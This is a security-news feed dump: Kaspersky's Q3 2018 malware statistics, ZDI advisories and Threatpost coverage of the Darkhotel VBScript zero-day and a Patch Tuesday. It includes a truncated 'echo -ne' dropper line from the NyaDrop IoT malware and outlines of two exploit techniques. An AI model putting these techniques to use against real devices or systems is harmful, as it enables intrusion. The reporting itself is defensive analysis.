\n\n| Service | % \n---|---|--- \nTelnet | 99.4% \nSSH | 0.6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (27.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Trojan-Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it consists of shellcode that downloads other malware from the same source computer that has just infected the victim IoT device. The shellcode doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. 
After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. 
Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious Office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few Kaspersky Lab product users (under 10,000) are excluded._ \n_** Unique users attacked by banking malware in the country as a percentage of all users of Kaspersky Lab products in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* 
\n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32.Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. 
The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. 
In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. 
Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1.99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. 
At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications._\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| | Country* | %** |\n|---|---|---|\n| 1 | Afghanistan | 16.85% |\n| 2 | Uzbekistan | 14.23% |\n| 3 | Kazakhstan | 10.17% |\n| 4 | Belarus | 9.73% |\n| 5 | Vietnam | 8.96% |\n| 6 | Indonesia | 8.80% |\n| 7 | Mozambique | 8.50% |\n| 8 | Ukraine | 7.60% |\n| 9 | Tanzania | 7.51% |\n| 10 | Azerbaijan | 7.13% |\n\n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. 
Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). 
They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already begun. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 vulnerability. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. 
To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. 
Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | Country* | %** |\n|---|---|---|\n| 1 | Venezuela | 35.88 |\n| 2 | Albania | 32.48 |\n| 3 | Algeria | 32.41 |\n| 4 | Belarus | 31.08 |\n| 5 | Armenia | 29.16 |\n| 6 | Ukraine | 28.67 |\n| 7 | Moldova | 28.64 |\n| 8 | Azerbaijan | 26.67 |\n| 9 | Kyrgyzstan | 25.80 |\n| 10 | Serbia | 25.38 |\n| 11 | Mauritania | 24.89 |\n| 12 | Indonesia | 24.68 |\n| 13 | Romania | 24.56 |\n| 14 | Qatar | 23.99 |\n| 15 | Kazakhstan | 23.93 |\n| 16 | Philippines | 23.84 |\n| 17 | Lithuania | 23.70 |\n| 18 | Djibouti | 23.70 |\n| 19 | Latvia | 23.09 |\n| 20 | Honduras | 22.97 |\n\n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or 
via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| | Country* | %** |\n|---|---|---|\n| 1 | Uzbekistan | 54.93 |\n| 2 | Afghanistan | 54.15 |\n| 3 | Yemen | 52.12 |\n| 4 | Turkmenistan | 49.61 |\n| 5 | Tajikistan | 49.05 |\n| 6 | Laos | 47.93 |\n| 7 | Syria | 47.45 |\n| 8 | Vietnam | 46.07 |\n| 9 | Bangladesh | 45.93 |\n| 10 | Sudan | 45.30 |\n| 11 | Ethiopia | 45.17 |\n| 12 | Myanmar | 44.61 |\n| 13 | Mozambique | 42.65 |\n| 14 | Kyrgyzstan | 42.38 |\n| 15 | Iraq | 42.25 |\n| 16 | Rwanda | 42.06 |\n| 17 | Algeria | 41.95 |\n| 18 | Cameroon | 40.98 |\n| 19 | Malawi | 40.70 |\n| 20 | Belarus | 40.66 |\n\n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\n_Geography of local malware attacks in Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "modified": "2018-11-12T10:00:55", "published": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2020-06-22T11:41:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-8373"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows VBScript. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of arrays. 
By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-08-14T00:00:00", "id": "ZDI-18-953", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-953/", "title": "Microsoft Windows VBScript Array Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-8345"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of .LNK files. Crafted data in a .LNK file can trigger access to a pointer prior to initialization. An attacker can leverage this vulnerability to execute code under the context of the current user.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-08-14T00:00:00", "id": "ZDI-18-942", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-942/", "title": "Microsoft Windows LNK File Uninitialized Pointer Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-07-16T08:13:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "Researchers have discovered that the Darkhotel APT is exploiting a recently-patched zero-day vulnerability impacting Microsoft VBScript.\n\nResearchers at Trend Micro recently disclosed the flaw in Microsoft Visual Basic Scripting Engine (VBScript), an active scripting language developed by Microsoft modeled on Visual Basic. 
The flaw is a remote code-execution vulnerability ([CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373?ranMID=24542&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ&epi=je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ&irgwc=1&OCID=AID681541_aff_7593_1243925&tduid=\\(ir_wqPRf:QNmVWaQgdzLGyG5XJfUkg0zn1lRX:FTM0\\)\\(7593\\)\\(1243925\\)\\(je6NUbpObpQ-UQjTbztLkW0290jkC0XcNQ\\)\\(\\)&irclickid=wqPRf:QNmVWaQgdzLGyG5XJfUkg0zn1lRX:FTM0>)) existing in the way that the scripting engine handles objects in memory in Internet Explorer.\n\nMicrosoft patched the flaw during last week\u2019s [Patch Tuesday](<https://threatpost.com/patch-tuesday-microsoft-addresses-two-zero-days-in-60-flaw-roundup/135103/>) \u2013 but soon after, researchers with Trend Micro and Qihoo 360 both linked the attack with the Darkhotel APT gang.\n\n\u201cIt can be seen from this incident that the [Darkhotel] attack gang has maintained a relatively high level of activity in recent years, and will even use the 0-day vulnerability for the purpose of attack,\u201d Qihoo 360 researchers said in their recent post about the [campaign](<https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/>).\n\n## CVE-2018-8373\n\nElliot Cao of Trend Micro Security Research (working with Trend Micro\u2019s Zero Day Initiative) first discovered the flaw July 11. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user \u2013 so if the current user is logged on with administrative-user rights, an attacker who successfully exploited the vulnerability could take control of an affected system, according to Microsoft. 
Attackers could then install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cIt could result in remote code-execution and grants the same privileges as the logged-in user, including administrative rights,\u201d said Chris Goettl, director of product management, security, for Ivanti, in an email. \u201cBecause this vulnerability exists in IE 9, 10 and 11, it affects all Windows operating systems from Server 2008 to Windows 10.\u201d\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website.\n\nThe flaw impacts the VBScript engine in the latest versions of Windows as well as Internet Explorer versions IE 9 and 10. Microsoft recently [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/>) VBScript in IE 11, meaning that this version of Internet Explorer is not impacted.\n\nMicrosoft has given the flaw a \u201c2\u201d on the Exploitability Index for the latest software release, meaning exploitation is less likely; however, exploitation has been detected on older releases, including the latest Darkhotel effort.\n\n## Darkhotel\n\nAfter discovering an exploit for CVE-2018-8373, Trend Micro researchers found that the sample used the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code-execution vulnerability [patched back in May](<https://threatpost.com/may-patch-tuesday-fixes-two-bugs-under-active-attack/131811/>).\n\n\u201cThis is similar to CVE-2018-8174, which has been circulating since before May\u2019s patch Tuesday, primarily in Asia\u2026 The same techniques were used by both exploits. 
Both were leveraging [use-after-frees] within VBScript Engine, were hitting similar functions within the engine, and had a similar method for running shellcode,\u201d Dustin Childs, with Trend Micro\u2019s ZDI, told Threatpost.\n\nAs the flaw was similar to the use-after-free (UAF) vulnerability in vbscript.dll, called Double Kill, which remained unpatched in the latest VBScript engine, researchers suspected that this exploit sample came from the same creator. Researchers were also able to obtain the domain name used by the exploit, and found that it was the same one used in May for Darkhotel APT.\n\nDarkhotel was first identified in [2014](<https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/>) by Kaspersky Lab researchers, who said the group had been active since at least 2007. The group was known for targeting diplomats and corporate executives via Wi-Fi networks at luxury hotels \u2013 and has since then continued accessing zero-day vulnerabilities and exploits.\n\n## Exploit\n\nThe original exploit was heavily obfuscated, but researchers were able to demonstrate a proof of concept (PoC) to explain how the flaw could be exploited.\n\n\u201cBased on our analysis, this vulnerability can be steadily exploited,\u201d Cao said in the analysis of the exploit. 
\u201cMoreover, since it is the second Visual Basic engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future.\u201d\n\nThere are three parts to the PoC exploit used to trigger use-after-free memory corruption, thus enabling attackers to run shellcode on the system: Using the vulnerability to modify a two-dimensional array\u2019s structure\u2019s length (to 0x0FFFFFFF), implementing read/write primitives and faking CONTEXT structure to execute shellcode.\n\nChilds told us that, while not widespread at this time, the exploit \u201ccertainly has the chance of broader use since it\u2019s a reliable attack.\u201d\n\nHe added, \u201cFor this to succeed, the attacker must convince the user to click a link or open a malicious file. This is usually done through spear phishing, but it could be links sent through messenger apps, too.\u201d\n\nCao recommended that users update their systems as soon as possible: \u201cAs a first line of defense, we recommend applying the latest security patches once they\u2019re available to prevent exploits,\u201d he said.\n", "modified": "2018-08-20T16:39:26", "published": "2018-08-20T16:39:26", "id": "THREATPOST:F6D26AE5EBA39346A2B00CE4C6470A88", "href": "https://threatpost.com/darkhotel-exploits-microsoft-zero-day-vbscript-flaw/136685/", "type": "threatpost", "title": "Darkhotel Exploits Microsoft Zero-Day VBScript Flaw", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-06T08:15:37", "bulletinFamily": "info", "cvelist": ["CVE-2018-3615", "CVE-2018-3620", "CVE-2018-3646", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8344", "CVE-2018-8373", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8385", "CVE-2018-8414"], "description": "Microsoft has rolled out its August Patch Tuesday fixes, addressing 19 critical vulnerabilities, including fixes for two zero-day vulnerabilities that are under active attack.\n\nOverall, the company patched 
a total of 60 flaws, spanning Microsoft Windows, Edge, Internet Explorer (IE), Office, .NET Framework, ChakraCore, Exchange Server, Microsoft SQL Server and Visual Studio. Of those, 19 were critical, 39 were rated important, one was moderate and one was rated low in severity.\n\n## Zero-Days\n\nThe patch [release](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/ecb26425-583f-e811-a96f-000d3a33c573>) includes two exploited flaws, CVE-2018-8373 and CVE-2018-8414, which were previously disclosed by researchers.\n\nThe first zero-day, CVE-2018-8373, could result in remote code-execution (RCE) and grants the same privileges as a logged-in user, including administrative rights. The vulnerability exists in IE 9, 10 and 11, impacting all Windows operating systems from Server 2008 to Windows 10.\n\nMeanwhile, CVE-2018-8414 also enables RCE with the privileges of the logged-in user, and exists on Windows 10 versions 1703 and newer, as well as Server 1709 and Server 1803.\n\n\u201cThe two zero-day vulnerabilities are \u2026 publicly disclosed and exploited,\u201d said Chris Goettl, director of product management, security, for Ivanti, in an email. \u201cCVE-2018-8373 is a vulnerability that exists in the way that the scripting engine handles objects in memory in Internet Explorer. CVE-2018-8414 code-execution vulnerability exists when the Windows Shell does not properly validate file paths.\u201d\n\nMicrosoft also issued fixes for security issues that don\u2019t impact Windows, but the company thought they were important enough to package into its OS updates, dubbed advisories.\n\nOne of these, [Advisory 180018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180016>), touched on a new Meltdown and Spectre variant. This advisory, \u201cMicrosoft Guidance to Mitigate L1TF Variant,\u201d addresses three vulnerabilities \u2013 CVE-2018-3615, CVE-2018-3620 and CVE-2018-3646. 
